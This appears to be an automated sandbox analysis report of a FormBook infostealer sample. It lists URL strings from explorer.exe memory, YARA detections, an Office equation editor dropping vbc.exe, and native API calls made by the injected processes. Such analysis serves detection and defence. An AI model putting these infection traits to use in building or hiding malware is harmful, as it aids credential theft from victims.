      Source: explorer.exe, 00000007.00000000.2194898096.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
      Source: explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2193140646.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: explorer.exe, 00000007.00000000.2194898096.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
      Source: explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
      Source: explorer.exe, 00000007.00000000.2192785429.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
      Source: explorer.exe, 00000007.00000000.2201672465.000000000842E000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Office equation editor drops PE fileShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pool[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004181C0 NtCreateFile,6_2_004181C0
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00418270 NtReadFile,6_2_00418270
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004182F0 NtClose,6_2_004182F0
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004183A0 NtAllocateVirtualMemory,6_2_004183A0
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004181BF NtCreateFile,6_2_004181BF
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041826B NtReadFile,6_2_0041826B
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00418212 NtReadFile,6_2_00418212
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004182EA NtClose,6_2_004182EA
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041831A NtReadFile,6_2_0041831A
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041839A NtAllocateVirtualMemory,6_2_0041839A
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041841A NtAllocateVirtualMemory,6_2_0041841A
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C600C4 NtCreateFile,LdrInitializeThunk,6_2_00C600C4
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C60048 NtProtectVirtualMemory,LdrInitializeThunk,6_2_00C60048
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C60078 NtResumeThread,LdrInitializeThunk,6_2_00C60078
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C607AC NtCreateMutant,LdrInitializeThunk,6_2_00C607AC
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5F9F0 NtClose,LdrInitializeThunk,6_2_00C5F9F0
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5F900 NtReadFile,LdrInitializeThunk,6_2_00C5F900
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_00C5FAD0
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5FAE8 NtQueryInformationProcess,LdrInitializeThunk,6_2_00C5FAE8
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5FBB8 NtQueryInformationToken,LdrInitializeThunk,6_2_00C5FBB8
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5FB68 NtFreeVirtualMemory,LdrInitializeThunk,6_2_00C5FB68
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5FC90 NtUnmapViewOfSection,LdrInitializeThunk,6_2_00C5FC90
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5FC60 NtMapViewOfSection,LdrInitializeThunk,6_2_00C5FC60
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5FDC0 NtQuerySystemInformation,LdrInitializeThunk,6_2_00C5FDC0
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5FD8C NtDelayExecution,LdrInitializeThunk,6_2_00C5FD8C
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_00C5FED0
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5FEA0 NtReadVirtualMemory,LdrInitializeThunk,6_2_00C5FEA0
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5FFB4 NtCreateSection,LdrInitializeThunk,6_2_00C5FFB4
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C610D0 NtOpenProcessToken,6_2_00C610D0
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C60060 NtQuerySection,6_2_00C60060
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C601D4 NtSetValueKey,6_2_00C601D4
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C61148 NtOpenThread,6_2_00C61148
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C6010C NtOpenDirectoryObject,6_2_00C6010C
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5F8CC NtWaitForSingleObject,6_2_00C5F8CC
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024E00C4 NtCreateFile,LdrInitializeThunk,8_2_024E00C4
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024E07AC NtCreateMutant,LdrInitializeThunk,8_2_024E07AC
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_024DFAD0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFAE8 NtQueryInformationProcess,LdrInitializeThunk,8_2_024DFAE8
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFAB8 NtQueryValueKey,LdrInitializeThunk,8_2_024DFAB8
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFB50 NtCreateKey,LdrInitializeThunk,8_2_024DFB50
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFB68 NtFreeVirtualMemory,LdrInitializeThunk,8_2_024DFB68
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFBB8 NtQueryInformationToken,LdrInitializeThunk,8_2_024DFBB8
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DF900 NtReadFile,LdrInitializeThunk,8_2_024DF900
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DF9F0 NtClose,LdrInitializeThunk,8_2_024DF9F0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_024DFED0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFFB4 NtCreateSection,LdrInitializeThunk,8_2_024DFFB4
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFC60 NtMapViewOfSection,LdrInitializeThunk,8_2_024DFC60
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFDC0 NtQuerySystemInformation,LdrInitializeThunk,8_2_024DFDC0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFD8C NtDelayExecution,LdrInitializeThunk,8_2_024DFD8C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024E0048 NtProtectVirtualMemory,8_2_024E0048
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024E0060 NtQuerySection,8_2_024E0060
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024E0078 NtResumeThread,8_2_024E0078
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024E10D0 NtOpenProcessToken,8_2_024E10D0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024E1148 NtOpenThread,8_2_024E1148
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024E010C NtOpenDirectoryObject,8_2_024E010C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024E01D4 NtSetValueKey,8_2_024E01D4
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFA50 NtEnumerateValueKey,8_2_024DFA50
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFA20 NtQueryInformationFile,8_2_024DFA20
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFBE8 NtQueryVirtualMemory,8_2_024DFBE8
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DF8CC NtWaitForSingleObject,8_2_024DF8CC
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DF938 NtWriteFile,8_2_024DF938
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024E1930 NtSetContextThread,8_2_024E1930
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFE24 NtWriteVirtualMemory,8_2_024DFE24
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFEA0 NtReadVirtualMemory,8_2_024DFEA0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFF34 NtQueueApcThread,8_2_024DFF34
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFFFC NtCreateProcessEx,8_2_024DFFFC
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFC48 NtSetInformationFile,8_2_024DFC48
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024E0C40 NtGetContextThread,8_2_024E0C40
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFC30 NtOpenProcess,8_2_024DFC30
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFC90 NtUnmapViewOfSection,8_2_024DFC90
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFD5C NtEnumerateKey,8_2_024DFD5C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024E1D80 NtSuspendThread,8_2_024E1D80
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B81C0 NtCreateFile,8_2_000B81C0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B8270 NtReadFile,8_2_000B8270
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B82F0 NtClose,8_2_000B82F0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B83A0 NtAllocateVirtualMemory,8_2_000B83A0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B81BF NtCreateFile,8_2_000B81BF
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B8212 NtReadFile,8_2_000B8212
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B826B NtReadFile,8_2_000B826B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B82EA NtClose,8_2_000B82EA
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B831A NtReadFile,8_2_000B831A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B839A NtAllocateVirtualMemory,8_2_000B839A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B841A NtAllocateVirtualMemory,8_2_000B841A
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0027BF7F6_2_0027BF7F
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004010306_2_00401030
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041B9736_2_0041B973
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041C1FB6_2_0041C1FB
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00408C5B6_2_00408C5B
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00408C606_2_00408C60
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041BC666_2_0041BC66
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00402D876_2_00402D87
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00402D906_2_00402D90
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041C75F6_2_0041C75F
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00402FB06_2_00402FB0
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C6E0C66_2_00C6E0C6
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C730406_2_00C73040
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C8905A6_2_00C8905A
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C9D0056_2_00C9D005
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C6E2E96_2_00C6E2E9
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00D112386_2_00D11238
